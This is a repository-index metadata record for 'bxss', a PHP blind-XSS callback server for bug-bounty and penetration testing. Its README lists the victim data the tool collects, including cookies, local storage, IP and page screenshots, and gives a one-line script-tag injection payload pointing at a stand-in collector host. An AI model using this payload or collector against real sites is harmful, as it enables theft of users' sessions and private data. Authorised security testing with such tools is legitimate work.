{"id":19199771,"url":"https://github.com/gwen001/bxss","last_synced_at":"2025-05-09T01:23:24.083Z","repository":{"id":63238290,"uuid":"563576637","full_name":"gwen001/bxss","owner":"gwen001","description":"Alternative to XSS Hunter for blind XSS.","archived":false,"fork":false,"pushed_at":"2022-12-08T17:05:37.000Z","size":453,"stargazers_count":50,"open_issues_count":1,"forks_count":11,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-03-31T20:12:06.436Z","etag":null,"topics":["bugbounty","pentesting","php","security-tools","xss","xsshunter"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/gwen001.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null},"funding":{"github":["gwen001"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2022-11-08T22:37:50.000Z","updated_at":"2025-02-28T21:50:28.000Z","dependencies_parsed_at":"2023-01-25T06:05:16.476Z","dependency_job_id":null,"html_url":"https://github.com/gwen001/bxss","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gwen001%2Fbxss","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gwen001%2Fbxss/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gwen001%2Fbxss/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gwen001%2Fbxss/manifests","owner_url":"https://repos.ecosyste.ms/api
/v1/hosts/GitHub/owners/gwen001","download_url":"https://codeload.github.com/gwen001/bxss/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253172161,"owners_count":21865472,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","pentesting","php","security-tools","xss","xsshunter"],"created_at":"2024-11-09T12:28:54.762Z","updated_at":"2025-05-09T01:23:24.063Z","avatar_url":"https://github.com/gwen001.png","language":"PHP","funding_links":["https://github.com/sponsors/gwen001"],"categories":[],"sub_categories":[],"readme":"\u003ch1 align=\"center\"\u003ebxss\u003c/h1\u003e\n\n\u003ch4 align=\"center\"\u003eMy alternative to XSS Hunter for blind XSS.\u003c/h4\u003e\n\n\u003cp align=\"center\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/php-%3E=5.5-blue\" alt=\"php badge\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/license-MIT-green\" alt=\"MIT license badge\"\u003e\n    \u003ca href=\"https://twitter.com/intent/tweet?text=https%3a%2f%2fgithub.com%2fgwen001%2fbxss%2f\" target=\"_blank\"\u003e\u003cimg src=\"https://img.shields.io/twitter/url?style=social\u0026url=https%3A%2F%2Fgithub.com%2Fgwen001%2Fbxss\" alt=\"twitter badge\"\u003e\u003c/a\u003e\n\u003c/p\u003e\n\n\u003c!-- \u003cp align=\"center\"\u003e\n    \u003cimg src=\"https://img.shields.io/github/stars/gwen001/bxss?style=social\" alt=\"github stars badge\"\u003e\n    \u003cimg src=\"https://img.shields.io/github/watchers/gwen001/bxss?style=social\" alt=\"github watchers badge\"\u003e\n    \u003cimg 
src=\"https://img.shields.io/github/forks/gwen001/bxss?style=social\" alt=\"github forks badge\"\u003e\n\u003c/p\u003e --\u003e\n\n---\n\n## Features\n\n- reports stored in `sqlite` database\n- calls logged in a log file\n- reports sent to a Slack channel (beta)\n- data collected: \n    - vulnerable URL\n    - referer URL\n    - victim IP\n    - victim User-Agent\n    - victim cookies\n    - victim local storage\n    - HTML of the vulnerable page\n    - screenshot of the vulnerable page\n\nTodo:  \n- reports sent by mail\n\n## Install\n\n```\ngit clone https://github.com/gwen001/bxss\n```\n\nThe web user should have write access to the directory `images`.\n\n## Configure domain\n\nUsing Apache, you can easily configure a vhost like this:\n\n```\n\u003cIfModule mod_ssl.c\u003e\n\u003cVirtualHost *:443\u003e\n\tServerName x.example.com\n\tServerAdmin webmaster@localhost\n\tDocumentRoot /var/www/html/bxss/\n\tSSLCertificateFile /etc/letsencrypt/live/x.example.com/fullchain.pem\n\tSSLCertificateKeyFile /etc/letsencrypt/live/x.example.com/privkey.pem\n\u003c/VirtualHost\u003e\n\u003c/IfModule\u003e\n\n\u003cVirtualHost *:80\u003e\n\tServerName x.example.com\n\tServerAdmin webmaster@localhost\n\tDocumentRoot /var/www/html/bxss/\n\u003c/VirtualHost\u003e\n```\n\n## Injection\n\nAs soon as the script is available online, you can use your favorite XSS payload:\n```\n\u003cscript src=http://x.example.com\u003e\u003c/script\u003e\n```\n\n---\n\n\u003cimg src=\"https://raw.githubusercontent.com/gwen001/bxss/main/preview.png\" /\u003e\n\n---\n\nFeel free to [open an issue](/../../issues/) if you have any problem with the script.  \n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgwen001%2Fbxss","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgwen001%2Fbxss","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgwen001%2Fbxss/lists"}